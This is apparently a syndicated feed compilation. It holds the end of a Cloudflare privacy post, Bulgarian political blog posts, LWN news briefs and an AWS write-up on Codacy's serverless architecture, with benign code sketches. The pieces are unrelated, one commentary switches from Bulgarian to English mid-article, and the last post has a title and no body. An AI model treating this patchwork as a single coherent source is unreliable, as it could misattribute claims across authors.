This means that unless the vulnerability is remediated, an attacker could execute code that not only exfiltrates data from a web server but also steals personal data from non-Internet-facing backend databases, such as billing systems. And because Java and Log4j are so widely used, thousands of servers and systems were impacted, which meant millions of users’ personal data was at risk.

We’re proud that, within hours of learning of the Log4j vulnerability, we rolled out new WAF rules written to protect all our customers’ sites (and our own) against this vulnerability. In addition, we and our customers were able to use our Zero Trust product, Cloudflare Access, to protect access to internal systems. Once we or a customer enabled Cloudflare Access on the identified attack surface, any exploit attempts to Cloudflare’s systems or the systems of customers would have required the attacker to authenticate. The ability to analyze server, network or traffic data generated by Cloudflare in the course of providing our service to the huge number of Internet applications that use us helped us better protect all of Cloudflare’s customers. Not only were we able to update WAF rules to mitigate the vulnerability, Cloudflare could use data to identify WAF evasion patterns and exfiltration attempts. This information enabled our customers to rapidly identify attack vectors on their own networks and mitigate the risk of harm.

As we discuss more below, we expect data localization debates to continue in 2022. At the same time, it’s important to realize that, if companies are forced to segment data by jurisdiction or to prevent access to data across jurisdictional borders, it would have been harder to mount the kind of response we were able to quickly provide to help our customers protect their own sites and networks against Log4j. We believe in ensuring both the privacy and security of data no matter what jurisdiction that data is stored in or flows through. And we believe those who would insist on data localization as a proxy for data protection above all else do a disservice to the security measures that are as important as regulations, if not more so, to protecting the privacy of personal data.

Data Localization

Data localization was a major focus in 2021 and that shows no sign of slowing in 2022. In fact, in the EU, the Austrian data protection authority (the Datenschutzbehörde) set quite the tone for this year. It published a decision January 13 stating that a European company could not use Google Analytics because it meant EU personal data was being transferred to the United States in what the regulator viewed as a violation of the EU General Data Protection Regulation (GDPR) as interpreted by the Court of Justice of the European Union’s 2020 decision in the “Schrems II” case.

We continue to disagree with the premise that the Schrems II decision means that EU personal data must not be transferred to the United States. Instead, we believe that there are safeguards that can be put in place to allow for such transfers pursuant to the EU Standard Contractual Clauses (SCCs) (contractual clauses approved by the EU Commission to enable EU personal data to be transferred outside the EU) in a manner consistent with the Schrems II decision. Cloudflare has had data protection safeguards in place since well before the Schrems II case, in fact, such as our industry-leading commitments on government data requests. We have updated our Data Processing Addendum (DPA) to incorporate the SCCs that the EU Commission approved in 2021. We also added additional safeguards as outlined in the EDPB’s June 2021 Recommendations on Supplementary Measures. Finally, Cloudflare’s services are certified under the ISO 27701 standard, which maps to the GDPR’s requirements.

In light of these measures, our EU customers can use Cloudflare’s services in a manner consistent with GDPR and the Schrems II decision. Still, we recognize that many of our customers want their EU personal data to stay in the EU. For example, some of our customers in industries like healthcare, law, and finance may have additional requirements. For these reasons, we developed our Data Localization Suite, which gives customers control over where their data is inspected and stored.

Cloudflare’s Data Localization Suite provides a viable solution for our customers who want to avoid transferring EU personal data outside the EU at a time when European regulators are growing increasingly critical of data transfers to the United States. We are particularly excited about the Customer Metadata Boundary component of the Data Localization Suite, because we have found a way to keep customer-identifiable end user log data in the EU for those EU customers who want that option, without sacrificing our ability to provide the security services our customers rely on us to provide.

In 2022, we will continue to fine tune our data localization offerings and expand to serve other regions where customers are finding a need to localize their data. 2021 saw China’s Personal Information Protection Law come into force with its data localization and cross-border data transfer requirements, and we are likely to see other jurisdictions, or perhaps specific industry guidelines, follow suit in 2022 in some form.

Pro-Privacy Analytics

We expect trackers (cookies, web beacons, etc.) to continue to be an area of focus in 2022 as well, and we are excited to play a role in ushering in a new era to help websites run third-party tools, such as analytics, in a faster, more secure, and more privacy-protective way. We were already thinking about privacy-first analytics in 2020 when we launched Web Analytics — a product that allowed websites to gather analytics information about their site users without using any client-side code.

Nevertheless, cookies, web beacons, and similar client-side trackers remain ubiquitous across the web. Each time a website operator uses these trackers, they open their site to potential security vulnerabilities, and they risk eroding the trust of their users who have grown weary of “cookie consent” banners and worry their personal data is being collected and tracked across the Internet. There has to be a better way, right? Turns out, there is.

As explained in greater detail in this blog post, Cloudflare’s Zaraz product not only allows a website to load faster and be more interactive, but it also reduces the amount of third-party code needed to run on a website, which makes it more secure. And this solution is also pro-privacy: it allows the website operator to have control over the data sent to third parties. Moving the execution of third-party tools to our network means website operators will be able to identify if tools are trying to collect personal data, and, if so, they can modify the data before it goes to the analytics providers (for example, strip URL queries, remove IP addresses of end users). As we’ve said so often, if we can reduce the amount of personal data that is sent across the Internet, that’s a win for privacy.
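To illustrate the kind of transformation being described (this is a generic sketch of the idea, not Zaraz’s implementation), stripping URL query strings and truncating client IP addresses before data leaves for an analytics provider can be as simple as:

# Generic sketch of pre-send scrubbing: drop URL query strings and truncate IPs.
# This is an illustration of the concept, not Cloudflare Zaraz code.
from urllib.parse import urlsplit, urlunsplit

def scrub_url(url: str) -> str:
    parts = urlsplit(url)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))  # drop query and fragment

def truncate_ip(ip: str) -> str:
    octets = ip.split(".")
    return ".".join(octets[:3] + ["0"])  # zero the last octet of an IPv4 address

event = {"url": scrub_url("https://example.com/page?user=42&token=abc"),
         "ip": truncate_ip("203.0.113.77")}
print(event)  # {'url': 'https://example.com/page', 'ip': '203.0.113.0'}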

Changing Privacy Landscape

As the old saying goes, the only constant is change. And as in 2021, 2022 will undoubtedly be a year of continued regulatory changes as we see new laws enacted, amended, or coming into effect that directly or indirectly regulate the collection, use, and transborder flow of personal data.

In the United States for example, 2022 will require companies to prepare for the California Privacy Rights Act (CPRA), which goes into effect January 1, 2023. Importantly, CPRA will have “retrospective requirements”, meaning companies will need to look back and apply rules to personal data collected as of January 1, 2022. Likewise, Virginia’s and Colorado’s privacy laws are coming into force in 2023. And a number of other States, including but not limited to Florida, Washington, Indiana, and the District of Columbia, have proposed their own privacy laws. For the most part, these bills are aimed at giving consumers greater control over their personal data — such as establishing consumers’ rights to access and delete their data — and placing obligations on companies to ensure those rights are protected and respected.

Meanwhile, elsewhere in the world, we are seeing a shift in data privacy legislation. No longer are data protection laws focusing only on personal data; they are expanding to regulate the flow of all types of data. The clearest example of this is in India, where a parliamentary committee in December 2021 included recommendations that the “Personal Data Protection Bill” be renamed the “Data Protection Bill” and that its scope be expanded to include non-personal data. The bill would place obligations on organizations to extend to non-personal data the same protections that existing data protection laws extend to personal data. The implications of the proposed updates to India’s Data Protection Bill are significant. They could dramatically impact the way in which organizations use non-personal data for analytics and operational improvements.

India is not the only country to propose expanding the scope of data regulation to include non-personal data. The European Union’s Data Strategy aims to provide a secure framework enhancing data sharing with the stated goal that such sharing will drive innovation and expedite the digitalization of the European economy.

Other data privacy legislation to keep an eye on in 2022 will be Japan’s amendment to its Act on Protection of Personal Information (APPI) and Thailand’s Personal Data Protection Act (PDPA), which will come into force in 2022. Proposed amendments to Japan’s APPI include requirements to be met in order to transfer Japanese personal data outside of Japan and the introduction of data breach notification requirements. Meanwhile, like the GDPR, Thailand’s PDPA aims to protect individuals’ personal data by imposing obligations on organizations that collect, process, and transfer such personal data.

With all these privacy enhancing technologies and regulatory changes on the horizon, we expect 2022 to be another exciting year in the world of data protection and data privacy. Happy Data Privacy Day!

My Candidacy for the National Council of Yes, Bulgaria

Post Syndicated from original https://yurukov.net/blog/2022/ns-dabulgaria/

This Saturday, the national conference of Yes, Bulgaria will be held. Three consecutive elections have left behind tremendous fatigue, but also plenty of questions and paths forward that need to be resolved.

There were, of course, plenty of attacks, conspiracies, and intrigues spun around the party. Some were expected; others we should have seen through earlier. It is easy to sink into the swamp of who said what and when, and we have done enough of that over the past year. If I had had any doubts about the way the party proceeds, the way it is led, or the work of the National Council, I would have walked away immediately and stopped being involved. I said as much on the day the party was founded.

Every decision in Yes, Bulgaria is made after thorough discussion and a vote in the National Council, which is why it matters who sits on it. I have disagreed with some decisions, but I have understood why others voted the way they did. That is the essence of the democratic process. If someone disagrees with this or that policy, partnership, or compromise, then Saturday is where, as a party member, they get to decide which people and which decisions they want to move forward with.

So if you are a member of Yes, Bulgaria, I would be grateful if you supported me as a candidate for the National Council. I am confident I have something to help with and contribute. I have laid out my positions in detail on social media and on my blog over the years. The decisions on them, like politics itself, are a process that has to be walked through. To do that, we need to sit at the table where the decisions and next steps are made, rather than watch and shout from the sidelines. You will find all the candidates and their arguments on the Yes, Bulgaria website.

The post My Candidacy for the National Council of Yes, Bulgaria first appeared on Yurukov's Blog.

It Doesn't Rattle of War, but of Kopecks

Post Syndicated from Emilia Milcheva original https://toest.bg/ne-drunchi-na-voyna-a-na-kopeyki/

Министър-председателят Кирил Петков е прав, когато казва, че „явно напрежението се вдига, но не дрънчи на война“. В България много по-силно дрънчи онова, което така и не бе дефинирано като заплаха от институции и управляващи – руската хибридна война, която е в апогея си от 2014-та, годината на анексията на Крим и сепаратистките републики в Източна Украйна, както и на санкциите срещу Русия.

Антинатовската и анти-САЩ пропаганда, която оттогава все по-отчетливо кънти от различни български медии и „говорещи глави“, бе улеснена от липсата на категорична позиция на българските правителства – независимо дали начело е Пламен Орешарски, или Бойко Борисов – относно действията на Русия в Украйна. Вече се чува и от трибуната на Народното събрание, с цялата си гарнитура в типичен максимално опростенчески стил – безпомощната Европа и изобщо проваленият Запад; „чуждите войски“ от НАТО, чиято марионетка е България, и изобщо войнолюбците от Алианса, от които „идва напрежението с Русия“. И лидерът на представената вече в парламента партия „Възраждане“ Костадин Костадинов иска референдум за излизане от НАТО, чийто член България избра да е преди 18 години. За същото настояваше преди време и Николай Малинов от Национално движение „Русофили“.

Геополитическото напрежение днес обаче изисква от София да спре с въртеливите движения във външната си политика в стила на един вече бивш премиер. Бойко Борисов се гордееше с уменията си да обслужва и едната, и другата велика сила и дори твърдеше, че може да го прави едновременно. (Но май повече го теглеше към Русия…)

В сряда 47-мият парламент изслуша премиера, министрите на отбраната и на външните работи – Стефан Янев и Теодора Генчовска, и на закрити врата – директорите на спецслужбите, заради напрежението по оста Русия–Украйна–НАТО. В крайна сметка заявеното от премиера е, че правителството е решило да акцентира в българската позиция „в посока деескалация на напрежението между НАТО и Руската федерация“. Какви изводи може да се направят?

Първо, позицията на България много закъсня.

За повишаване на напрежението между Москва и Киев се говори от поне четири месеца, тоест от времето, когато Янев беше служебен премиер. Но нито той, нито президентът Румен Радев, който го назначи, поставиха тази тема в дневния ред и тя отсъстваше и от заседанията на Консултативния съвет по национална сигурност към президента, и от тези на Съвета по сигурността към Министерския съвет. Като служебен премиер Янев свика Съвета заради корупцията, мигрантската вълна от Афганистан, но не и заради непосредствената заплаха за националната сигурност, каквато би бил един конфликт в Черно море и Украйна.

Още от 2014 г. България е силно обезпокоена от напрежението по източния фланг, каза вчера в парламента външната министърка. Ако е имало такова безпокойство, било е твърде дискретно проявено. Българската позиция, заявена след КСНС при президента Росен Плевнелиев през март 2014 г. и приета от всички политически сили с изключение на „Атака“, бе, че референдумът в Крим е незаконен (чиито резултати станаха формален аргумент за Москва да анексира украинския полуостров). Позиция на парламента обаче нямаше. По-късно и тогавашният премиер Орешарски, и следващият – Борисов, се обявиха за отпадане на санкциите срещу Русия. Както впрочем и президентът Румен Радев, който в кампанията за втория си мандат каза: „Крим в момента е руски, какъв да е!“

Second, disagreements within the government on the subject of Russia surfaced once again.

They first became visible with Stefan Yanev's Facebook post in which he came out against the deployment of NATO troops in Bulgaria. It drew an international response, and the Russian Embassy in Bulgaria shared it on its own Facebook account. Prime Minister Petkov corrected it – it was not the government's official position – but the discord was felt again. The prime minister's firmness before the MPs contrasted with the evasiveness of the defense minister, who repeated, albeit in other words, his earlier opinion.

The position of the Bulgarian government is very clear and straightforward – to be a constructive ally in NATO and a responsible member and partner in the EU, with a predictable and clearly declared position, and no one should be freelancing on this topic.

Kiril Petkov

We do not envisage hosting allied NATO ground troops in our country; instead, a battalion will be created that can also be sent abroad for NATO exercises… accordingly, its command and control, the chain of command for exchanging information with NATO's military bodies, will run through national communication channels.

Stefan Yanev

In his statement to Parliament, Yanev overdid it: "Not a single Bulgarian soldier will take part in a conflict or operation on the territory of Ukraine or any other country without those decisions being taken in this hall – the National Assembly." But of course that is so even without the president's minister promising it – the Constitution mandates it, Art. 84, item 11: "The National Assembly authorizes the dispatch and use of Bulgarian armed forces outside the country, as well as the stationing of foreign troops on the territory of the country or their passage through it." It was by decision of the 39th National Assembly that a Bulgarian contingent was sent to Iraq as part of the Multinational Force, and it was again Parliament that approved Bulgaria's participation in the International Security Assistance Force mission in Afghanistan…

Yet the American television network CNN reported that Bulgaria, Romania, and Hungary are discussing the deployment of American troops ahead of a possible Russian intervention in Ukraine – contingents of about 1,000 soldiers in each of the three countries. And Bulgarian National Radio (BNR) reported that Bulgaria does not want American NATO troops but is prepared to accept, for example, French ones. The decision is yet to be made. But if Bulgaria's leaders are afraid to tell the public that NATO – regardless of the contingent's nationality – guarantees Bulgaria's security, then Russia's conduits have done their job.

Third, the defense capabilities of the Bulgarian army and investments in security came into focus –

and not only because of the need to strengthen the weak link on NATO's southeastern flank. Besides the prime minister, the co-chair of "Democratic Bulgaria", Hristo Ivanov, also spoke about them.

We must invest in our own defense. We must invest purposefully and consistently in areas such as energy, cybersecurity, and the state of the services and institutions on which national security depends. That includes the fight against corruption, which has always been an enormous portal through which foreign influences, mainly Russian, have entered Bulgaria.

Hristo Ivanov

But it also means that the defense minister cannot decide to buy two second-hand submarines before the ruling coalition has decided and approved which of the army's modernization and rearmament projects are priorities. Submarines, incidentally, were already being negotiated by defense minister Karakachanov in Borissov's third government.

Fourth, is the Bulgarian minority in Ukraine in the focus of Bulgarian foreign policy –

in the context of the escalating tension? We are talking about some 250,000 Bulgarians, in whom no one showed any interest during the hearing of the prime minister and the ministers. The government announced that it is ready to send an aircraft to Ukraine for the Bulgarian diplomats and their families. At a press conference the day after the hearing, Foreign Minister Teodora Genchovska said that they had been in contact with the Bulgarian Embassy in Ukraine for two weeks and that so far no desire for evacuation had been expressed, but "the evacuation plans have been updated" and, if necessary, "our NATO partners will provide logistics."

On BNR this week, political scientist Ognyan Minchev commented that a propaganda campaign is being waged to convince Bulgarian citizens that any full-fledged participation of ours in NATO structures is directed against the Bulgarian national interest because it will drag us into a conflict with Russia. That propaganda will not subside – on the contrary. The deployment of a NATO contingent will be exploited, just like the servile energy dependence on Moscow, which no government has broken so far.

You can hear the kopecks rattling.

Cover photo: Defense Minister Stefan Yanev during the parliamentary hearing on 25 January 2022. Still from a video report by Debati.bg

Source

Individual and Collective Rights: Notes on a Remark by Rumen Radev

Post Syndicated from Svetla Encheva original https://toest.bg/individualni-i-kolektivni-prava/

During his visit to Sofia, the Macedonian prime minister Dimitar Kovachevski hinted, without mentioning them directly, that Bulgarians could be written into the Constitution of the Republic of North Macedonia. According to the Bulgarian Cultural Club in Skopje, however, such a step would provide grounds for recognizing a Macedonian minority in Bulgaria. And indeed, if Bulgaria demands that the Bulgarian minority be written into the Constitution of the Republic of North Macedonia, shouldn't our country act reciprocally and write a Macedonian minority into its own basic law?

President Rumen Radev does not think so. Right after Prime Minister Kiril Petkov's visit to our southwestern neighbor, Radev justified a negative answer to this question as follows:

Any claims that if Bulgaria demands equal rights for the Macedonian Bulgarians, enshrined in the Constitution, Macedonia could in turn, as reciprocity, demand a Macedonian minority in Bulgaria, are absolutely untenable […] Let us not forget that our constitutional frameworks are fundamentally different. The Bulgarian Constitution provides for the protection of individual rights, whereas the Macedonian Constitution is based on collective rights of parts of peoples. So there is no way this could ever happen.

Radev's words went without comment, yet they deserve closer scrutiny. They fit into a particular intellectual-political current according to which only individual rights are authentic, while collective rights do not really exist – that is, they are not genuine rights. Hence, in the president's view, the Bulgarian Constitution is perfectly fine as it is – it is the Macedonian one that needs to change.

The idea of universal human rights is a concept of classical liberalism,

within which rights are precisely individual. Society consists of individuals who by nature possess inalienable rights. These rights do not depend on origin, tradition, or anything else. The classic liberal thinker John Locke, for example, describes the mind as a blank slate upon which experience writes. In the same way, society is something like an empty field structured by human action.

The philosophy of liberalism suited the emerging modern society, which opposed the aristocracy. At the other pole is classical conservatism, which – understandably – has little love for the idea of human rights and the primacy of the individual. From the conservative point of view, society rests on traditions, culture, and values. To behave as though society were an empty field and nothing existed before you is like toppling cultural monuments and burning books.

Over time, both liberalism and conservatism changed and acquired many varieties.

Taken to its extreme, liberalism arrives at its own negation. Universal human rights proceed from their creators' conceptions of the human being – and even more from the horizon of those who apply the rights in practice. And some group of people is always missing from those conceptions: women, slaves, the poor, indigenous communities, ethnic or racial minorities… That is why, in otherwise modern and liberal societies, women gained an equal right to vote so late. (The last Swiss canton to allow women to vote did so only in 1990, and only after a ruling by the Federal Court.) And members of many indigenous communities were literally exterminated because they did not fit the "correct" conception of the human being.

Thus, over time, we arrive at the idea of collective (group) rights, meant to compensate those for whom the supposedly universal rights do not fit. By origin, the concept of collective rights is neither liberal nor conservative but left-wing. It was the left that fought first for workers' rights and then for women's rights. In totalitarian states and in its radical variants, the left too reaches its own opposite, declaring human rights a bourgeois invention – because according to the far left, freedom must be achieved not through a struggle for rights but through revolution.

Meanwhile, the concept of collective rights is being applied more and more, though not universally. Adopted by the European Union as well, it provides more possibilities for guaranteeing equal rights for members of various vulnerable and minority groups.

How can rights be both group rights and equal rights?

Let us take an example. In theory, everyone has the right to visit a given public institution – an individual right. But the institution is entered via stairs, which is an obstacle for people who use wheelchairs. Installing a ramp enables people with disabilities to exercise the right granted to them. In other words, access to individual rights would not be possible for everyone if we did not acknowledge the existence of groups with specific needs, whose members face specific obstacles in exercising their rights.

Incidentally, even where group rights exist, they never apply to everyone but depend on certain conditions being met. Even the guarantee of the right to life, the most basic human right, depends on many factors – citizenship, migration status, economic or social standing, war… But the concept of group rights, imperfect as it is, at least recognizes its own imperfection and tries to correct itself. It also recognizes that

in practice, individual rights are always group rights – always somebody's.

Nowadays, individual rights are above all a cause of libertarians, who in economic terms are closer to conservatives than to classical liberals. Gradually, however, they are becoming a cause of the (neo)conservatives themselves – talking about individual rights in order to defend the privileged position of a particular group (usually that of the dominant majority) is a winning strategy.

Take, for example, American conservatives of the Trumpist type. Building a wall on the border with Mexico does not contradict "individual rights," because Mexicans are not part of the "we" group. But when it comes to protection against COVID-19, the individual right to freedom and personal choice turns out to stand above everything, above all the public interest, since society consists of individuals.

The same can be said of our own nationalists, especially those of "Vazrazhdane", who are deeply concerned about the rights of Bulgarians everywhere in the world and want to introduce total censorship through education. But when it comes to certificates and measures, they suddenly turn into extreme individualists and adepts of absolute freedom. VMRO, too, talks about the individual freedom of parents to raise their children as they see fit – as though the child were not a subject of rights, while the family possessed rights like an individual.

A similar inconsistency can be seen with regard to hate speech.

By definition, it targets members of particular groups. According to libertarians and neoconservatives, the concept of hate speech restricts the individual's absolute freedom of expression. In other words, it is permissible to insult people solely on the basis of their belonging to a certain group, but if they want to defend themselves against this – they cannot, because they belong to a certain group.

The paradox of absolutizing individual rights shows in many other respects as well. Take same-sex marriage. One of the main arguments against it is that group rights are essentially "special rights." The truth is exactly the opposite – marriage between a man and a woman includes the group of men and women who marry each other and excludes everyone else who wants to marry a person of their own sex. Yet it is precisely the "special rights" argument that leads when equal rights are denied to members of discriminated groups.

"No man is an island, entire of itself […] And therefore never send to know for whom the bell tolls; it tolls for thee,"

wrote the English poet and preacher John Donne in the 17th century (translated into Bulgarian by Alexander Shurbanov), a few years before John Locke was born. Donne's works can be assigned to the tradition of conservatism, threatened by liberalism with its island individuals. Three centuries later, his most famous meditation already allowed a reading from left-wing positions, giving Ernest Hemingway's novel "For Whom the Bell Tolls" its title. And four centuries after Donne, would-be conservatives cling to the individual and his rights like a drowning man to a straw. And with them – the Bulgarian president Rumen Radev.

Radev's remark about the difference between the Bulgarian and Macedonian Constitutions exposes the full hypocrisy of the contemporary version of the idea that individual rights are the only valid ones. In Bulgaria, where we are the majority, rights are individual, yet at the same time we want to take advantage of collective rights in other countries where we are a minority. If the Macedonians are fools enough to include minorities in their basic law, then they should include us too.

It would be naive to expect that because Rumen Radev was nominated for president by the BSP, he is left-wing – the BSP itself has long been left-wing only in words. The president behaves like a classic populist, voicing the notions of those "patriots" who want the rights of Bulgarians as an ethnic community to be guaranteed everywhere in the world, while offering nothing in return to those who live in Bulgaria but are not ethnic Bulgarians.

Populism does not respond to arguments. Neither do radical and one-sided ideologies. And yet, between populism and the extremes there is enough space to reflect on how we define human rights – and on what follows from one definition or another.

Cover photo: Km Wilhelm / Wikimedia

Source

Rosenzweig: Writing an open source GPU driver – without the hardware

Post Syndicated from original https://lwn.net/Articles/882974/rss

Here’s a war story from Alyssa Rosenzweig on the process of writing a free driver for Arm’s “Valhall” GPUs without having the hardware to test it on.

In 2021, there were no Valhall devices running mainline Linux. While a lack of devices poses an obvious obstacle to device driver development, there is no better time to write drivers than before hardware reaches end-users. Developing and distributing production-quality drivers takes time, and we don’t want users to be reliant on closed source blobs. If development doesn’t start until a device hits shelves, that device could reach “end-of-life” by the time there are mature open drivers. But with a head start, we can have drivers ready by the time devices reach end users.

LSFMM 2022 call for proposals

Post Syndicated from original https://lwn.net/Articles/882966/rss

The Linux Storage, Filesystem, Memory-Management, and BPF Summit is scheduled for May 2 to 4 in Palm Springs, California; with luck it will actually happen this year. As usual, it is an invitation-only event, with a preference for those who bring interesting topics to discuss. The call for proposals is out now, with a request for proposals to arrive before March 1.

GNU poke 2.0 released

Post Syndicated from original https://lwn.net/Articles/882965/rss

Version 2.0 of GNU Poke, a binary-data editor, has been released. “A lot of things have changed and improved with respect to the 1.x series; we have fixed many bugs and added quite a lot of new exciting and useful features.” Look below for an extensive list of changes.

Codacy Measures Developer Productivity using AWS Serverless

Post Syndicated from Catarina Gralha original https://aws.amazon.com/blogs/architecture/codacy-measures-developer-productivity-using-aws-serverless/

Codacy is a DevOps insights company based in Lisbon, Portugal. Since its launch in 2012, Codacy has helped software development and engineering teams reduce defects, keep technical debt in check, and ship better code, faster.

Codacy’s latest product, Pulse, is a service that helps understand and improve the performance of software engineering teams. This includes measuring metrics such as deployment frequency, lead time for changes, or mean time to recover. Codacy’s main platform is built on top of AWS products like Amazon Elastic Kubernetes Service (EKS), but they have taken Pulse one step further with AWS serverless.

In this post, we will explore Pulse’s requirements, its architecture, and the services it is built on, including AWS Lambda, Amazon API Gateway, and Amazon DynamoDB.

Pulse prototype requirements

Codacy had three clear requirements for their initial Pulse prototype.

  1. The solution must enable the development team to iterate quickly and have minimal time-to-market (TTM) to validate the idea.
  2. The solution must be easily scalable and match the demands of both startups and large enterprises alike. This was of special importance, as Codacy wanted to onboard Pulse with some of their existing customers. At the time, these customers already had massive amounts of information.
  3. The solution must be cost-effective, particularly during the early stages of the product development.

Enter AWS serverless

Codacy could have built Pulse on top of Amazon EC2 instances. However, this brings the undifferentiated heavy lifting of having to provision, secure, and maintain the instances themselves.

AWS serverless technologies are fully managed services that abstract the complexity of infrastructure maintenance away from developers and operators, so they can focus on building products.

Serverless applications also scale elastically and automatically behind the scenes, so customers don’t need to worry about capacity provisioning. Furthermore, these services are highly available by design and span multiple Availability Zones (AZs) within the Region in which they are deployed. This gives customers higher confidence that their systems will continue running even if one Availability Zone is impaired.

AWS serverless technologies are cost-effective too, as they are billed per unit of value, as opposed to billing per provisioned capacity. For example, billing is calculated by the amount of time a function takes to complete or the number of messages published to a queue, rather than how long an EC2 instance runs. Customers only pay when they are getting value out of the services, for example when serving an actual customer request.

Overview of Pulse’s solution architecture

An event is generated when a developer performs a specific action as part of their day-to-day tasks, such as committing code or merging a pull request. These events are the foundational data that Pulse uses to generate insights and are thus processed by multiple Pulse components called modules.

Let’s take a detailed look at a few of them.

Ingestion module

Figure 1. Pulse ingestion module architecture

Figure 1 shows the ingestion module, which is the entry point of events into the Pulse platform and is built on AWS serverless applications as follows:

  • The ingestion API is exposed to customers using Amazon API Gateway. This defines REST, HTTP, and WebSocket APIs with sophisticated functionality such as request validation, rate limiting, and more.
  • The actual business logic of the API is implemented as AWS Lambda functions. Lambda can run custom code in a fully managed way. You only pay for the time that the function takes to run, in 1-millisecond increments. Lambda natively supports multiple languages, but customers can also bring their own runtimes or container images as needed.
  • API requests are authorized with keys, which are stored in Amazon DynamoDB, a key-value NoSQL database that delivers single-digit millisecond latency at any scale. API Gateway invokes a Lambda function that validates the key against those stored in DynamoDB (this is called a Lambda authorizer); a minimal sketch of such an authorizer follows this list.
  • While API Gateway provides a default domain name for each API, Codacy customizes it with Amazon Route 53, a service that registers domain names and configures DNS records. Route 53 offers a service level agreement (SLA) of 100% availability.
  • Events are stored in raw format in Pulse’s data lake, which is built on top of AWS’ object storage service, Amazon Simple Storage Service (S3). With Amazon S3, you can store massive amounts of information at low cost using simple HTTP requests. The data is highly available and durable.
  • Whenever a new event is ingested by the API, a message is published in Pulse’s message bus. (More information later in this post.)
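To make the authorizer step concrete, here is a minimal sketch, assuming a TOKEN-type Lambda authorizer and a hypothetical DynamoDB table named api-keys with a hypothetical customerId attribute (Codacy’s actual table and attribute names are not public):

```python
# A minimal sketch (not Codacy's actual code) of a Lambda authorizer that
# validates an API key against a hypothetical DynamoDB table named "api-keys".
import os
import boto3

dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table(os.environ.get("API_KEYS_TABLE", "api-keys"))  # hypothetical table name


def handler(event, context):
    # For a TOKEN authorizer, API Gateway passes the key in "authorizationToken".
    api_key = event.get("authorizationToken", "")

    # Look the key up in DynamoDB; single-digit millisecond reads keep the
    # authorizer fast enough to sit in front of every request.
    item = table.get_item(Key={"apiKey": api_key}).get("Item")
    effect = "Allow" if item else "Deny"

    # Return the IAM policy document that API Gateway expects from a Lambda authorizer.
    return {
        "principalId": item.get("customerId", "anonymous") if item else "anonymous",
        "policyDocument": {
            "Version": "2012-10-17",
            "Statement": [{
                "Action": "execute-api:Invoke",
                "Effect": effect,
                "Resource": event["methodArn"],
            }],
        },
    }
```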

Events module

Figure 2. Pulse events module architecture

The events module handles the aggregation and storage of events for actual consumption by customers, see Figure 2:

  • Events are consumed from the message bus and processed with a Lambda function, which stores them in Amazon Redshift (a rough sketch of this consumer follows the list).
  • Amazon Redshift is AWS’ managed data warehouse, and enables Pulse’s users to get insights and metrics by running analytical (OLAP) queries with the highest performance.
  • These metrics are exposed to customers via another API (the public API), which is also built on API Gateway.
  • The business logic for this API is implemented using Lambda functions, like the Ingestion module.
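As a rough illustration (not Codacy’s actual code), a consumer Lambda along these lines could unwrap the SNS envelope from each SQS record and write the event into Redshift through the Redshift Data API. The cluster, database, user, and table names below are hypothetical placeholders:

```python
# A sketch of the events-module consumer: a Lambda triggered by the SQS queue
# that is subscribed to the message bus, writing each event into Redshift via
# the Redshift Data API.
import json
import boto3

redshift_data = boto3.client("redshift-data")


def handler(event, context):
    for record in event["Records"]:              # SQS batch delivered to Lambda
        body = json.loads(record["body"])
        # SNS envelopes the original event (assuming raw message delivery is off).
        message = json.loads(body["Message"])

        # Parameterized INSERT; a production pipeline would likely batch or COPY instead.
        redshift_data.execute_statement(
            ClusterIdentifier="pulse-warehouse",   # hypothetical cluster name
            Database="pulse",                      # hypothetical database
            DbUser="pulse_writer",                 # hypothetical database user
            Sql="INSERT INTO events (event_type, payload) VALUES (:type, :payload)",
            Parameters=[
                {"name": "type", "value": message.get("type", "unknown")},
                {"name": "payload", "value": json.dumps(message)},
            ],
        )
```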

Message bus

Figure 3. Message bus architecture

We mentioned earlier that Pulse’s modules exchange messages with each other via the “message bus.” When something occurs at a specific component, a message (event) is published to the bus. At the same time, developers create subscriptions for each module that should receive these messages. This is known as the publisher/subscriber pattern (pub/sub for short), and is a fundamental piece of event-driven architectures.

With the message bus, you can decouple all modules from each other. In this way, a publisher does not need to worry about how many or who their subscribers are, or what to do if a new one arrives. This is all handled by the message bus.

Pulse’s message bus is built like this, shown in Figure 3:

  • Events are published via Amazon Simple Notification Service (SNS), using a construct called a topic. Topics are the basic unit of message publication and consumption. Components are subscribed to this topic, and you can filter out unwanted messages.
  • Developers configure Amazon SNS subscriptions to have the events sent to a queue, which provides a buffering layer from which workers can process messages. At the same time, queues also ensure that messages are not lost if there is an error. In Pulse’s case, these queues are implemented with Amazon Simple Queue Service (SQS).
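Here is a minimal boto3 sketch of that pub/sub wiring. The topic, queue, and filter attribute names are hypothetical, in practice this would likely live in infrastructure-as-code rather than ad hoc API calls, and the SQS queue policy that allows SNS to deliver messages is omitted for brevity:

```python
# A minimal sketch of the SNS topic + SQS subscription pattern described above.
import json
import boto3

sns = boto3.client("sns")
sqs = boto3.client("sqs")

# 1. The message bus itself: an SNS topic that publishers write to.
topic_arn = sns.create_topic(Name="pulse-message-bus")["TopicArn"]

# 2. A buffering queue for one subscriber module (e.g., the events module).
queue_url = sqs.create_queue(QueueName="events-module-queue")["QueueUrl"]
queue_arn = sqs.get_queue_attributes(
    QueueUrl=queue_url, AttributeNames=["QueueArn"]
)["Attributes"]["QueueArn"]

# 3. Subscribe the queue to the topic; a filter policy drops unwanted messages
#    so each module only receives the event types it cares about.
sns.subscribe(
    TopicArn=topic_arn,
    Protocol="sqs",
    Endpoint=queue_arn,
    Attributes={"FilterPolicy": json.dumps({"eventType": ["commit", "pull_request"]})},
)

# 4. A publisher (e.g., the ingestion module) emits an event without knowing
#    who, if anyone, is listening.
sns.publish(
    TopicArn=topic_arn,
    Message=json.dumps({"repository": "example/repo", "action": "merged"}),
    MessageAttributes={"eventType": {"DataType": "String", "StringValue": "pull_request"}},
)
```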

Other modules

There are other parts of Pulse architecture that also use AWS serverless. For example, user authentication and sign-up are handled by Amazon Cognito, and Pulse’s frontend application is hosted on Amazon S3. This app is served to customers worldwide with low latency using Amazon CloudFront, a content delivery network.

Summary and next steps

By using AWS serverless, Codacy has been able to reduce the time required to bring Pulse to market by staying focused on developing business logic, rather than managing servers. Furthermore, Codacy is confident they can handle Pulse’s growth, as this serverless architecture will scale automatically according to demand.

How to deploy AWS Network Firewall to help protect your network from malware

Post Syndicated from Ajit Puthiyavettle original https://aws.amazon.com/blogs/security/how-to-deploy-aws-network-firewall-to-help-protect-your-network-from-malware/

